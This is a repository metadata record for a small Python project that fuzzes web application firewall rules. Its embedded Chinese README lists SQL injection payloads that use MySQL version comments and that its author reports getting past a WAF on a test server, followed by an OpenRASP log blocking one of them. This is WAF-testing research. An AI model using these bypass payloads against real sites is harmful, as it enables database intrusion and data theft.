{"id":21027588,"url":"https://github.com/caledoniaproject/waf-fuzz-example","last_synced_at":"2025-08-19T19:17:48.282Z","repository":{"id":146442296,"uuid":"120918000","full_name":"CaledoniaProject/waf-fuzz-example","owner":"CaledoniaProject","description":"Example code to Fuzz WAF rules","archived":false,"fork":false,"pushed_at":"2018-02-09T14:59:01.000Z","size":3,"stargazers_count":1,"open_issues_count":0,"forks_count":2,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-01-20T14:48:51.360Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CaledoniaProject.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-02-09T14:51:51.000Z","updated_at":"2018-02-09T16:07:17.000Z","dependencies_parsed_at":"2023-03-30T11:06:03.292Z","dependency_job_id":null,"html_url":"https://github.com/CaledoniaProject/waf-fuzz-example","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2Fwaf-fuzz-example","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2Fwaf-fuzz-example/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2Fwaf-fuzz-example/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2Fwaf-fuzz-example/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CaledoniaProject","download_url":"https://codeload.github.com/CaledoniaProject/waf-fuzz-example/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243467025,"owners_count":20295306,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-19T11:51:44.887Z","updated_at":"2025-03-13T19:12:37.898Z","avatar_url":"https://github.com/CaledoniaProject.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# waf-fuzz-example\n\n[来自 FreeBUF: Fuzz自动化Bypass软WAF姿势](http://www.freebuf.com/sectool/161808.html)\n\n# 测试方法\n\n修改 `main.py`，修改你的模板和服务器地址，即可复现。根据作者思路重写了下代码，方便后面改造\n\n```\n%\u003e python main.py\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!/*!select*/1,0x41424344\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!+select*/1,0x41424344\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0aselect*/1,0x41424344\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0bselect*/1,0x41424344\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0cselect*/1,0x41424344\n[PASS] http://172.16.177.120/mysql.php?id=-1/*!union/*!/*!/*!%0dselect*/1,0x41424344\n```\n\n# 写在最后\n\n当然，这个工具只能 Fuzz WAF，生成的测试规则都无法绕过 [OpenRASP](https://rasp.baidu.com) 的算法#2\n\n```\n{\n  \"referer\": \"\",\n  \"attack_type\": \"sql\",\n  \"intercept_state\": \"block\",\n  \"plugin_confidence\": 100,\n  \"plugin_name\": \"java_builtin_plugin\",\n  \"server_version\": \"7.0.78\",\n  \"server_hostname\": \"devnull\",\n  \"url\": \"http://127.0.0.1:8080/mysql/?id\\u003d1/*!union/*!/*!/**/.select*/1,0x41424344\",\n  \"target\": \"127.0.0.1\",\n  \"path\": \"/mysql/\",\n  \"event_type\": \"attack\",\n  \"attack_params\": {\n    \"mysql_connection_id\": \"104\",\n    \"server\": \"mysql\",\n    \"query\": \"SELECT * FROM users WHERE id \\u003d 1/*!union/*!/*!/**/.select*/1,0x41424344\"\n  },\n  \"server_ip\": \"127.0.0.1\",\n  \"stack_trace\": \"com.mysql.jdbc.StatementImpl.executeQuery(StatementImpl.java)\\norg.apache.jsp.index_jsp.runQuery(index_jsp.java:28)\\norg.apache.jsp.index_jsp._jspService(index_jsp.java:127)\\norg.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)\\njavax.servlet.http.HttpServlet.service(HttpServlet.java:731)\\norg.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:439)\\norg.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:395)\\norg.apache.jasper.servlet.JspServlet.service(JspServlet.java:339)\\njavax.servlet.http.HttpServlet.service(HttpServlet.java:731)\\norg.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)\\norg.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\\norg.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)\\norg.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)\\norg.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)\\norg.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218)\\norg.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)\\norg.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506)\\norg.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)\\norg.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)\\norg.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962)\\n\",\n  \"attack_source\": \"127.0.0.1\",\n  \"request_id\": \"02cf3e7b34e64243bd0c1548ee135601\",\n  \"event_time\": \"2018-02-09T22:50:47\",\n  \"plugin_message\": \"禁止MySQL版本号注释\",\n  \"user_agent\": \"python-requests/2.11.1\",\n  \"server_type\": \"Tomcat\"\n}\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaledoniaproject%2Fwaf-fuzz-example","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcaledoniaproject%2Fwaf-fuzz-example","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcaledoniaproject%2Fwaf-fuzz-example/lists"}